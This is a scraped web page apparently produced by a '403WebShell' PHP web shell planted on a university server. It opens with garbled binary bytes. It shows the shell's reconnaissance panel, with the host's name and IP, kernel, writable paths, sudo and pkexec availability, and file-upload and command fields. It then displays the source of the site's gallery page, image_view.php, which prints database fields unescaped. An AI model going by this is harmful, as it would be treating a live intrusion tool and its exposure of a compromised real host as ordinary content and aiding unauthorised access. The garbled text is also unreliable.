h(  ) ($6;EbBLkfu�_l� ''8;DUFKV3Dd#,?ANk&5G$/(5M\^�ms����Sb�,;R''6c2I�!\����kx�Ve�[i��Me�IYO7:nOL~�Kr�qrv�I:�BM�y��s}r��K����x)1�6@r*2�89ma��&��'ti������{~#������t)1�2<�0:^5�W.uFzQ/u}�v��vv�u��U37yDJeEJo(/�5Ds'1�:Jlu�iy�iy�hw�1;:S`^BMLOQQn,4�7C�8C�>Lfe�]k�[i�Zg��IW�LZ�EP;,.��Tc�q(0) G,/]/1����w�r��l&-t*3�<<�u��#����j&.u��J68\8?"#$%&'()*+,-./0 ! 
Notice: Undefined index: dl in /var/www/html/web/simple.mini.php on line 1
403WebShell
403Webshell
Server IP : 10.254.12.21  /  Your IP : 10.254.12.21
Web Server : Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.6.40
System : Linux arit.skru.ac.th 3.10.0-1160.76.1.el7.x86_64 #1 SMP Wed Aug 10 16:21:17 UTC 2022 x86_64
User : apache ( 48)
PHP Version : 5.6.40
Disable Function : NONE
MySQL : ON  |  cURL : ON  |  WGET : OFF  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /proc/5800/root/var/www/html/arit/igallery/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :

[ Back ]     

Current File : /proc/5800/root/var/www/html/arit/igallery/image_view.php
<?php include 'dbconnect.php'; ?>
<!DOCTYPE html>
<html lang="zxx" class="no-js">
<head>
	<meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
	<link rel="shortcut icon" href="img/fav.png">
	<meta name="author" content="Colorlib">
	<meta name="description" content="">
	<meta name="keywords" content="">
	<meta charset="UTF-8">
	<title>ภาพกิจกรรม</title>
	<link href="https://fonts.googleapis.com/css?family=Poppins:100,300,500,600" rel="stylesheet">
	<link rel="stylesheet" href="css/linearicons.css">
	<link rel="stylesheet" href="css/font-awesome.min.css">
	<link rel="stylesheet" href="css/nice-select.css">
	<link rel="stylesheet" href="css/magnific-popup.css">
	<link rel="stylesheet" href="css/bootstrap.css">
	<link rel="stylesheet" href="css/main.css">
</head>
<body>
	<div class="main-wrapper-first">
		<div class="hero-area relative">
			<header>
				<div class="container">
					<div class="header-wrap">
						<div class="header-top d-flex justify-content-between align-items-center">
							<div class="logo">
								<h3 class="text-uppercase"><a href="https://arit.skru.ac.th"><img src="img/aritlogo2.png" alt="" width="120px"> สำนักวิทยบริการและเทคโนโลยีสารสนเทศ</a></h3>
							</div>
							<div class="main-menubar d-flex align-items-center">
								<nav class="hide">
									<a href="../../igallery.php">Home</a>
									<a href="admin/pages/index.php">Admin</a>
								</nav>
								<div class="menu-bar"><span class="lnr lnr-menu"></span></div>
							</div>
						</div>
					</div>
				</div>
			</header>
		</div>
	</div>

	<div class="main-wrapper">
		<div class="white-bg">
			<div class="container">
				<div class="section-top-border">
<?php
	// ตรวจสอบว่า 'id' ถูกส่งมาใน URL หรือไม่
	if (isset($_GET['id']) && is_numeric($_GET['id'])) {
		$gallery_id = $_GET['id'];
	} else {
		echo "<p>ไม่พบข้อมูล</p>";
		exit;
	}

	// ใช้ Prepared Statements เพื่อป้องกัน SQL Injection
	$sql = "SELECT * FROM gallery WHERE gallery_id = ?";
	$stmt = mysqli_prepare($conn, $sql);
	mysqli_stmt_bind_param($stmt, "i", $gallery_id);
	mysqli_stmt_execute($stmt);
	$query = mysqli_stmt_get_result($stmt);

	if ($result = mysqli_fetch_array($query, MYSQLI_ASSOC)) {
		$gallery_url = $result["gallery_url"];
?>						
    <h2><?php echo $result["gallery_name"]; ?></h2>
	<p><?php echo $result["gallery_detail"]; ?></p>
	<div class="row gallery-item">
<?php	
	// แสดงภาพในแกลลอรี่
	$sql = "SELECT * FROM gallery_image WHERE gallery_id = ? ORDER BY image_order ASC";
	$stmt = mysqli_prepare($conn, $sql);
	mysqli_stmt_bind_param($stmt, "i", $gallery_id);
	mysqli_stmt_execute($stmt);
	$query = mysqli_stmt_get_result($stmt);

	$num_rows = mysqli_num_rows($query);

	$per_page = 15;   // Per Page
	$page  = isset($_GET["Page"]) ? $_GET["Page"] : 1;
	$prev_page = $page - 1;
	$next_page = $page + 1;

	$row_start = (($per_page * $page) - $per_page);
	if ($num_rows <= $per_page) {
		$num_pages = 1;
	} else if (($num_rows % $per_page) == 0) {
		$num_pages = ($num_rows / $per_page);
	} else {
		$num_pages = ($num_rows / $per_page) + 1;
		$num_pages = (int)$num_pages;
	}

	$row_end = $per_page;

	$sql .= " LIMIT $row_start ,$row_end";
	//$query = mysqli_query($conn, $sql);
	/*$stmt = mysqli_prepare($conn, $sql);
	mysqli_stmt_bind_param($stmt, "i", $gallery_id);
	mysqli_stmt_execute($stmt);
	$query = mysqli_stmt_get_result($stmt);*/

	$stmt = mysqli_prepare($conn, $sql);
	mysqli_stmt_bind_param($stmt, "i", $gallery_id);
	mysqli_stmt_execute($stmt);
	
	// ดึงผลลัพธ์ออกมา
	$query = mysqli_stmt_get_result($stmt);
	
	while ($result = mysqli_fetch_assoc($query)) {	
	//while ($result = mysqli_fetch_array($query, MYSQLI_ASSOC)) {
		$show_image = "image_gallery/" . $gallery_id . "/" . $result["image_file"];
?>							
		<div class="col-md-4">
			<a href="<?php echo $show_image; ?>" class="img-pop-up">
				<div class="single-gallery-image" style="background: url(<?php echo $show_image; ?>);"></div>
			</a>
		</div>						
<?php
	} // while
?>							
	</div>
<?php
	if (!empty($gallery_url)) {
?>
		<p></p><p align="center"><a href="<?php echo $gallery_url; ?>" target="_blank"><button type="button" class="btn btn-primary">ดูรูปภาพทั้งหมด</button></a></p>
<?php
	} else {
?>
		<br><p align="center">Total <?php echo $num_rows; ?> Image : <?php echo $num_pages; ?> Page</p>
<?php
	}
?>
	<ul class="pagination justify-content-center">
<?php
	if ($prev_page) {
?>
		<li class="page-item">
			<a class="page-link" href="<?php echo $_SERVER['SCRIPT_NAME'] . "?Page=" . $prev_page . "&id=" . $gallery_id; ?>" aria-label="Previous">
				<span aria-hidden="true">&laquo;</span>
				<span class="sr-only">Previous</span>
			</a>
		</li>
<?php
	}
	for ($i = 1; $i <= $num_pages; $i++) {
		if ($i != $page) {
?>
		<li class="page-item">
			<a class="page-link" href="<?php echo $_SERVER['SCRIPT_NAME'] . "?Page=" . $i . "&id=" . $gallery_id; ?>"><?php echo $i; ?></a>
		</li>
<?php
		} else {
?>
		<li class="page-item">
			<a class="page-link"><?php echo $i; ?></a>
		</li>
<?php
		}
	}
	if ($page != $num_pages) {
?>
		<li class="page-item">
			<a class="page-link" href="<?php echo $_SERVER['SCRIPT_NAME'] . "?Page=" . $next_page . "&id=" . $gallery_id; ?>" aria-label="Next">
				<span aria-hidden="true">&raquo;</span>
				<span class="sr-only">Next</span>
			</a>
		</li>
<?php
	}
?>
	</ul>						
<?php
	} else {
		echo "<p>ไม่พบข้อมูล</p>";
	}
?>							
				</div>
			</div>
		</div>
		<section class="footer-area pt-60 pb-60">
			<div class="container">
				<footer>
					<div class="footer-content">
						<div class="text-center">
							Copyright © 2018 All rights reserved   |   This template is made with <i class="fa fa-heart-o" aria-hidden="true"></i> by <a href="https://colorlib.com">Colorlib</a>
						</div>
					</div>
				</footer>
			</div>
		</section>
	</div>

	<script src="js/vendor/jquery-2.2.4.min.js"></script>
	<script src="https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.11.0/umd/popper.min.js" crossorigin="anonymous"></script>
	<script src="js/vendor/bootstrap.min.js"></script>
	<script src="js/jquery.ajaxchimp.min.js"></script>
	<script src="js/jquery.nice-select.min.js"></script>
	<script src="js/jquery.magnific-popup.min.js"></script>
	<script src="js/waypoints.min.js"></script>
	<script src="js/jquery.counterup.min.js"></script>
	<script src="js/main.js"></script>
</body>
</html>

Youez - 2016 - github.com/yon3zu
LinuXploit